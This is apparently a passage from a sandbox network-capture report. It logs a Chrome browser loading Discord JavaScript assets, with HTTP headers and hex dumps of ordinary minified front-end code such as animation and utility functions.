                                                                          2023-12-10 16:45:09 UTC1369INData Raw: 6e 2e 79 2c 69 2e 79 29 2c 62 28 64 2e 79 2c 66 2e 79 29 2c 62 28 70 2e 79 2c 68 2e 79 29 2c 62 28 76 2e 79 2c 6d 2e 79 29 2c 7a 28 6b 2e 79 2c 5f 2e 79 29 2c 43 28 74 2e 65 61 73 69 6e 67 46 75 6e 63 74 69 6f 6e 73 29 5b 30 5d 29 29 7d 7d 28 68 28 68 28 7b 7d 2c 74 29 2c 7b 76 61 6c 75 65 54 79 70 65 3a 22 56 65 63 74 6f 72 32 22 7d 29 29 7d 76 61 72 20 56 3d 69 2e 66 6f 72 77 61 72 64 52 65 66 28 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 61 3d 74 2e 63 6c 61 73 73 4e 61 6d 65 2c 6f 3d 74 2e 65 6e 76 69 72 6f 6e 6d 65 6e 74 2c 6c 3d 74 2e 6f 6e 43 6c 69 63 6b 2c 64 3d 74 2e 6f 6e 4d 6f 75 73 65 44 6f 77 6e 2c 66 3d 74 2e 6f 6e 4d 6f 75 73 65 4d 6f 76 65 2c 70 3d 74 2e 6f 6e 4d 6f 75 73 65 55 70 2c 76 3d 74 2e 6f 6e 42 65 66 6f 72 65 52 65 6e
                                                                          Data Ascii: n.y,i.y),b(d.y,f.y),b(p.y,h.y),b(v.y,m.y),z(k.y,_.y),C(t.easingFunctions)[0]))}}(h(h({},t),{valueType:"Vector2"}))}var V=i.forwardRef(function(t,e){var a=t.className,o=t.environment,l=t.onClick,d=t.onMouseDown,f=t.onMouseMove,p=t.onMouseUp,v=t.onBeforeRen
                                                                          2023-12-10 16:45:09 UTC1369INData Raw: 46 2e 63 75 72 72 65 6e 74 3d 77 69 6e 64 6f 77 2e 72 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 28 4d 29 29 7d 2c 5b 4d 5d 29 3b 76 61 72 20 4f 3d 69 2e 75 73 65 43 61 6c 6c 62 61 63 6b 28 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 50 2e 63 75 72 72 65 6e 74 2e 73 65 74 28 74 2e 69 64 2c 7b 63 6f 6e 66 65 74 74 69 3a 74 2c 73 70 72 69 74 65 43 61 6e 76 61 73 3a 65 7d 29 2c 6e 75 6c 6c 3d 3d 46 2e 63 75 72 72 65 6e 74 26 26 4d 28 29 7d 2c 5b 4d 5d 29 2c 55 3d 69 2e 75 73 65 43 61 6c 6c 62 61 63 6b 28 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 2c 69 2c 61 29 7b 76 61 72 20 6f 2c 75 2c 6c 2c 64 2c 66 2c 70 2c 76 2c 79 2c 52 2c 56 2c 50 2c 46 2c 44 2c 45 2c 4d 2c 55 3d 28 6f 3d 6e 75 6c 6c 21 3d 3d 28 4d 3d 74 2e 69 64 29 26 26 76 6f 69 64 20
                                                                          Data Ascii: F.current=window.requestAnimationFrame(M))},[M]);var O=i.useCallback(function(t,e){P.current.set(t.id,{confetti:t,spriteCanvas:e}),null==F.current&&M()},[M]),U=i.useCallback(function(t,e,n,i,a){var o,u,l,d,f,p,v,y,R,V,P,F,D,E,M,U=(o=null!==(M=t.id)&&void
                                                                          2023-12-10 16:45:09 UTC1369INData Raw: 22 3a 65 3d 6b 28 74 2e 76 61 6c 75 65 29 3b 76 61 72 20 75 3d 6b 28 74 2e 73 74 61 72 74 29 2c 6c 3d 6b 28 74 2e 66 69 6e 61 6c 29 2c 63 3d 6b 28 74 2e 64 75 72 61 74 69 6f 6e 29 2c 73 3d 6b 28 74 2e 64 69 72 65 63 74 69 6f 6e 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 6d 28 6e 65 77 20 67 28 65 2e 78 2c 75 2e 78 2c 6c 2e 78 2c 63 2e 78 2c 73 2e 78 2c 74 2e 65 61 73 69 6e 67 46 75 6e 63 74 69 6f 6e 29 2c 6e 65 77 20 67 28 65 2e 79 2c 75 2e 79 2c 6c 2e 79 2c 63 2e 7a 2c 73 2e 79 2c 74 2e 65 61 73 69 6e 67 46 75 6e 63 74 69 6f 6e 29 2c 6e 65 77 20 67 28 65 2e 7a 2c 75 2e 7a 2c 6c 2e 7a 2c 63 2e 7a 2c 73 2e 7a 2c 74 2e 65 61 73 69 6e 67 46 75 6e 63 74 69 6f 6e 29 29 3b 63 61 73 65 22 6f 73 63 69 6c 6c 61 74 69 6e 67 2d 72 61 6e 64 6f 6d 22 3a 6e 3d 6b 28 74 2e
                                                                          Data Ascii: ":e=k(t.value);var u=k(t.start),l=k(t.final),c=k(t.duration),s=k(t.direction);return new m(new g(e.x,u.x,l.x,c.x,s.x,t.easingFunction),new g(e.y,u.y,l.y,c.z,s.y,t.easingFunction),new g(e.z,u.z,l.z,c.z,s.z,t.easingFunction));case"oscillating-random":n=k(t.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          234192.168.2.549968162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:09 UTC866OUTGET /assets/13798.5d1df801cfc219755d66.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=dPS26sSQJQbE3uPVddYoKuGobua4yJj6RAT9CXWe_4s-1702226708068-0-604800000
                                                                          2023-12-10 16:45:09 UTC1129INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 38 30 30 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 34 65 35 38 39 65 31 37 34 37 39 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:09 GMTContent-Type: application/javascriptContent-Length: 8009Connection: closeCF-Ray: 8336f4e589e17479-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.com
                                                                          2023-12-10 16:45:09 UTC240INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 31 33 37 39 38 22 5d 2c 7b 33 33 34 37 38 32 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 66 6f 72 28 76 61 72 20 6e 3d 2d 31 2c 65 3d 6e 75 6c 6c 3d 3d 74 3f 30 3a 74 2e 6c 65 6e 67 74 68 3b 2b 2b 6e 3c 65 26 26 21 31 21 3d 3d 72 28 74 5b 6e 5d 2c 6e 2c 74 29 3b 29 3b 72 65 74 75 72 6e 20 74 7d 7d 2c 32 35 33 37 39 32 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 76 61 72 20 65 3d 6e 28 22 37 36 36 36 36 35 22 29 2c
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["13798"],{334782:function(t,r,n){t.exports=function(t,r){for(var n=-1,e=null==t?0:t.length;++n<e&&!1!==r(t[n],n,t););return t}},253792:function(t,r,n){var e=n("766665"),
                                                                          2023-12-10 16:45:09 UTC1369INData Raw: 6f 3d 6e 28 22 35 36 31 36 36 32 22 29 2c 63 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 76 61 72 20 75 3d 74 5b 72 5d 3b 28 21 28 63 2e 63 61 6c 6c 28 74 2c 72 29 26 26 6f 28 75 2c 6e 29 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 26 26 21 28 72 20 69 6e 20 74 29 29 26 26 65 28 74 2c 72 2c 6e 29 7d 7d 2c 33 36 36 37 32 36 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 76 61 72 20 65 3d 6e 28 22 33 33 30 31 32 34 22 29 2c 6f 3d 6e 28 22 34 36 36 37 33 31 22 29 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 72 65 74 75 72 6e 20 74 26 26 65 28 72 2c 6f 28 72 29 2c 74 29 7d 7d 2c 38 35 35 30 32 33 3a
                                                                          Data Ascii: o=n("561662"),c=Object.prototype.hasOwnProperty;t.exports=function(t,r,n){var u=t[r];(!(c.call(t,r)&&o(u,n))||void 0===n&&!(r in t))&&e(t,r,n)}},366726:function(t,r,n){var e=n("330124"),o=n("466731");t.exports=function(t,r){return t&&e(r,o(r),t)}},855023:
                                                                          2023-12-10 16:45:09 UTC1369INData Raw: 5d 3d 21 30 2c 55 5b 22 5b 6f 62 6a 65 63 74 20 45 72 72 6f 72 5d 22 5d 3d 55 5b 53 5d 3d 55 5b 22 5b 6f 62 6a 65 63 74 20 57 65 61 6b 4d 61 70 5d 22 5d 3d 21 31 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 20 74 28 72 2c 6e 2c 46 2c 6b 2c 50 2c 5f 29 7b 76 61 72 20 42 2c 45 3d 31 26 6e 2c 4d 3d 32 26 6e 2c 43 3d 34 26 6e 3b 69 66 28 46 26 26 28 42 3d 50 3f 46 28 72 2c 6b 2c 50 2c 5f 29 3a 46 28 72 29 29 2c 76 6f 69 64 20 30 21 3d 3d 42 29 72 65 74 75 72 6e 20 42 3b 69 66 28 21 67 28 72 29 29 72 65 74 75 72 6e 20 72 3b 76 61 72 20 44 3d 64 28 72 29 3b 69 66 28 44 29 7b 69 66 28 42 3d 6c 28 72 29 2c 21 45 29 72 65 74 75 72 6e 20 66 28 72 2c 42 29 7d 65 6c 73 65 7b 76 61 72 20 4c 3d 6a 28 72 29 2c 4e 3d 4c 3d 3d 53 7c 7c 22 5b 6f 62 6a 65 63 74
                                                                          Data Ascii: ]=!0,U["[object Error]"]=U[S]=U["[object WeakMap]"]=!1;t.exports=function t(r,n,F,k,P,_){var B,E=1&n,M=2&n,C=4&n;if(F&&(B=P?F(r,k,P,_):F(r)),void 0!==B)return B;if(!g(r))return r;var D=d(r);if(D){if(B=l(r),!E)return f(r,B)}else{var L=j(r),N=L==S||"[object
                                                                          2023-12-10 16:45:09 UTC1369INData Raw: 6e 7d 7d 2c 38 39 30 30 32 32 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 76 61 72 20 65 3d 2d 31 2c 6f 3d 74 2e 6c 65 6e 67 74 68 3b 72 3c 30 26 26 28 72 3d 2d 72 3e 6f 3f 30 3a 6f 2b 72 29 2c 28 6e 3d 6e 3e 6f 3f 6f 3a 6e 29 3c 30 26 26 28 6e 2b 3d 6f 29 2c 6f 3d 72 3e 6e 3f 30 3a 6e 2d 72 3e 3e 3e 30 2c 72 3e 3e 3e 3d 30 3b 66 6f 72 28 76 61 72 20 63 3d 41 72 72 61 79 28 6f 29 3b 2b 2b 65 3c 6f 3b 29 63 5b 65 5d 3d 74 5b 65 2b 72 5d 3b 72 65 74 75 72 6e 20 63 7d 7d 2c 31 36 38 38 35 30 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 76 61 72 20 65 3d 6e 28 22 34 34 36 32 38 38 22 29 2c 6f 3d 6e 28 22 37 37 35 37 33 30 22 29 2c 63 3d 6e 28 22 36 32 35 33 30 31 22 29
                                                                          Data Ascii: n}},890022:function(t,r,n){t.exports=function(t,r,n){var e=-1,o=t.length;r<0&&(r=-r>o?0:o+r),(n=n>o?o:n)<0&&(n+=o),o=r>n?0:n-r>>>0,r>>>=0;for(var c=Array(o);++e<o;)c[e]=t[e+r];return c}},168850:function(t,r,n){var e=n("446288"),o=n("775730"),c=n("625301")
                                                                          2023-12-10 16:45:09 UTC1369INData Raw: 29 3a 7b 7d 7d 7d 2c 35 36 39 37 38 37 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 76 61 72 20 65 3d 6e 28 22 39 35 34 38 37 33 22 29 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 76 61 72 20 6e 3d 72 3f 65 28 74 2e 62 75 66 66 65 72 29 3a 74 2e 62 75 66 66 65 72 3b 72 65 74 75 72 6e 20 6e 65 77 20 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 6e 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 6c 65 6e 67 74 68 29 7d 7d 2c 33 33 30 31 32 34 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 76 61 72 20 65 3d 6e 28 22 32 35 33 37 39 32 22 29 2c 6f 3d 6e 28 22 37 36 36 36 36 35 22 29 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 2c 63 29 7b 76 61 72 20 75 3d 21 6e 3b 6e 7c 7c 28 6e 3d 7b 7d 29 3b
                                                                          Data Ascii: ):{}}},569787:function(t,r,n){var e=n("954873");t.exports=function(t,r){var n=r?e(t.buffer):t.buffer;return new t.constructor(n,t.byteOffset,t.length)}},330124:function(t,r,n){var e=n("253792"),o=n("766665");t.exports=function(t,r,n,c){var u=!n;n||(n={});
                                                                          2023-12-10 16:45:09 UTC1369INData Raw: 7d 2c 34 39 33 31 31 38 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 76 61 72 20 65 3d 6e 28 22 39 35 34 38 37 33 22 29 2c 6f 3d 6e 28 22 32 30 33 30 38 30 22 29 2c 63 3d 6e 28 22 37 33 38 32 37 39 22 29 2c 75 3d 6e 28 22 38 34 30 31 33 32 22 29 2c 61 3d 6e 28 22 35 36 39 37 38 37 22 29 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 76 61 72 20 69 3d 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 73 77 69 74 63 68 28 72 29 7b 63 61 73 65 22 5b 6f 62 6a 65 63 74 20 41 72 72 61 79 42 75 66 66 65 72 5d 22 3a 72 65 74 75 72 6e 20 65 28 74 29 3b 63 61 73 65 22 5b 6f 62 6a 65 63 74 20 42 6f 6f 6c 65 61 6e 5d 22 3a 63 61 73 65 22 5b 6f 62 6a 65 63 74 20 44 61 74 65 5d 22 3a 72 65 74 75 72 6e 20 6e 65 77 20 69 28 2b 74 29 3b 63
                                                                          Data Ascii: },493118:function(t,r,n){var e=n("954873"),o=n("203080"),c=n("738279"),u=n("840132"),a=n("569787");t.exports=function(t,r,n){var i=t.constructor;switch(r){case"[object ArrayBuffer]":return e(t);case"[object Boolean]":case"[object Date]":return new i(+t);c
                                                                          2023-12-10 16:45:09 UTC924INData Raw: 6c 28 4f 62 6a 65 63 74 29 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 21 63 28 74 29 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 65 28 74 29 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 72 3d 6f 28 74 29 3b 69 66 28 6e 75 6c 6c 3d 3d 3d 72 29 72 65 74 75 72 6e 21 30 3b 76 61 72 20 6e 3d 69 2e 63 61 6c 6c 28 72 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 72 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6e 26 26 6e 20 69 6e 73 74 61 6e 63 65 6f 66 20 6e 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 66 7d 7d 2c 31 35 34 39 34 38 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 76 61 72 20 65 3d 6e 28 22 31 32 39 36 37 33 22 29 2c 6f 3d 6e
                                                                          Data Ascii: l(Object);t.exports=function(t){if(!c(t)||"[object Object]"!=e(t))return!1;var r=o(t);if(null===r)return!0;var n=i.call(r,"constructor")&&r.constructor;return"function"==typeof n&&n instanceof n&&a.call(n)==f}},154948:function(t,r,n){var e=n("129673"),o=n


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          235192.168.2.549970162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:09 UTC866OUTGET /assets/63550.a619020e4c7b3d5be7ac.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=ZSpCVMywQiiVfPT7vOGew6YWOI9N27ZE4E8DXhnYM1s-1702226709260-0-604800000
                                                                          2023-12-10 16:45:10 UTC1119INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 37 39 36 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 34 65 39 35 38 35 63 34 39 37 65 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:10 GMTContent-Type: application/javascriptContent-Length: 7964Connection: closeCF-Ray: 8336f4e9585c497e-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.com
                                                                          2023-12-10 16:45:10 UTC250INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 36 33 35 35 30 22 5d 2c 7b 33 31 30 30 31 33 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6f 3d 7b 63 68 69 6c 64 43 6f 6e 74 65 78 74 54 79 70 65 73 3a 21 30 2c 63 6f 6e 74 65 78 74 54 79 70 65 73 3a 21 30 2c 64 65 66 61 75 6c 74 50 72 6f 70 73 3a 21 30 2c 64 69 73 70 6c 61 79 4e 61 6d 65 3a 21 30 2c 67 65 74 44 65 66 61 75 6c 74 50 72 6f 70 73 3a 21 30 2c 6d 69 78 69 6e 73 3a 21 30 2c 70 72 6f 70 54 79 70 65 73 3a 21 30 2c 74 79 70 65 3a 21 30 7d 2c 72 3d 7b 6e 61 6d 65
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["63550"],{310013:function(t,e,n){"use strict";var o={childContextTypes:!0,contextTypes:!0,defaultProps:!0,displayName:!0,getDefaultProps:!0,mixins:!0,propTypes:!0,type:!0},r={name
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 3a 21 30 2c 6c 65 6e 67 74 68 3a 21 30 2c 70 72 6f 74 6f 74 79 70 65 3a 21 30 2c 63 61 6c 6c 65 72 3a 21 30 2c 61 72 67 75 6d 65 6e 74 73 3a 21 30 2c 61 72 69 74 79 3a 21 30 7d 2c 69 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 69 66 28 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 65 29 7b 76 61 72 20 73 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 4e 61 6d 65 73 28 65 29 3b 69 26 26 28 73 3d 73 2e 63 6f 6e 63 61 74 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 29 29 3b 66 6f 72 28 76 61 72 20 68 3d 30
                                                                          Data Ascii: :!0,length:!0,prototype:!0,caller:!0,arguments:!0,arity:!0},i="function"==typeof Object.getOwnPropertySymbols;t.exports=function(t,e,n){if("string"!=typeof e){var s=Object.getOwnPropertyNames(e);i&&(s=s.concat(Object.getOwnPropertySymbols(e)));for(var h=0
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3d 6e 75 6c 6c 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 21 6e 26 26 28 6e 3d 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 29 2c 6e 3d 6e 75 6c 6c 7d 2c 65 29 29 7d 7d 28 74 68 69 73 2e 5f 63 68 65 63 6b 46 6f 72 49 6e 74 65 72 73 65 63 74 69 6f 6e 73 2e 62 69 6e 64 28 74 68 69 73 29 2c 74 68 69 73 2e 54 48 52 4f 54 54 4c 45 5f 54 49 4d 45 4f 55 54 29 2c 74 68 69 73 2e 5f 63 61 6c 6c 62 61 63 6b 3d 74 2c 74 68 69 73 2e 5f 6f 62 73 65 72 76 61 74 69 6f 6e 54 61 72 67 65 74 73 3d 5b 5d 2c 74 68 69 73 2e 5f 71 75 65 75 65 64 45 6e 74 72 69 65 73 3d 5b 5d 2c 74 68 69 73 2e 5f 72 6f 6f 74 4d 61 72 67 69 6e 56 61 6c 75 65 73 3d 74 68 69 73 2e 5f 70 61 72 73 65 52
                                                                          Data Ascii: function(t,e){var n=null;return function(){!n&&(n=setTimeout(function(){t(),n=null},e))}}(this._checkForIntersections.bind(this),this.THROTTLE_TIMEOUT),this._callback=t,this._observationTargets=[],this._queuedEntries=[],this._rootMarginValues=this._parseR
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 75 65 75 65 64 45 6e 74 72 69 65 73 2e 73 6c 69 63 65 28 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 71 75 65 75 65 64 45 6e 74 72 69 65 73 3d 5b 5d 2c 74 7d 2c 49 6e 74 65 72 73 65 63 74 69 6f 6e 4f 62 73 65 72 76 65 72 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 6e 69 74 54 68 72 65 73 68 6f 6c 64 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 7c 7c 5b 30 5d 3b 72 65 74 75 72 6e 21 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 26 26 28 65 3d 5b 65 5d 29 2c 65 2e 73 6f 72 74 28 29 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 69 66 28 22 6e 75 6d 62 65 72 22 21 3d 74 79 70 65 6f 66 20 74 7c 7c 69 73 4e 61 4e 28 74 29 7c 7c 74 3c 30 7c 7c 74 3e 31 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 74 68 72 65 73 68 6f 6c 64
                                                                          Data Ascii: ueuedEntries.slice();return this._queuedEntries=[],t},IntersectionObserver.prototype._initThresholds=function(t){var e=t||[0];return!Array.isArray(e)&&(e=[e]),e.sort().filter(function(t,e,n){if("number"!=typeof t||isNaN(t)||t<0||t>1)throw Error("threshold
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 61 6c 3d 6e 75 6c 6c 2c 72 28 74 2c 22 72 65 73 69 7a 65 22 2c 74 68 69 73 2e 5f 63 68 65 63 6b 46 6f 72 49 6e 74 65 72 73 65 63 74 69 6f 6e 73 2c 21 30 29 2c 72 28 65 2c 22 73 63 72 6f 6c 6c 22 2c 74 68 69 73 2e 5f 63 68 65 63 6b 46 6f 72 49 6e 74 65 72 73 65 63 74 69 6f 6e 73 2c 21 30 29 2c 74 68 69 73 2e 5f 64 6f 6d 4f 62 73 65 72 76 65 72 26 26 28 74 68 69 73 2e 5f 64 6f 6d 4f 62 73 65 72 76 65 72 2e 64 69 73 63 6f 6e 6e 65 63 74 28 29 2c 74 68 69 73 2e 5f 64 6f 6d 4f 62 73 65 72 76 65 72 3d 6e 75 6c 6c 29 29 7d 2c 49 6e 74 65 72 73 65 63 74 69 6f 6e 4f 62 73 65 72 76 65 72 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 63 68 65 63 6b 46 6f 72 49 6e 74 65 72 73 65 63 74 69 6f 6e 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 72 6f 6f
                                                                          Data Ascii: al=null,r(t,"resize",this._checkForIntersections,!0),r(e,"scroll",this._checkForIntersections,!0),this._domObserver&&(this._domObserver.disconnect(),this._domObserver=null))},IntersectionObserver.prototype._checkForIntersections=function(){var e=this._roo
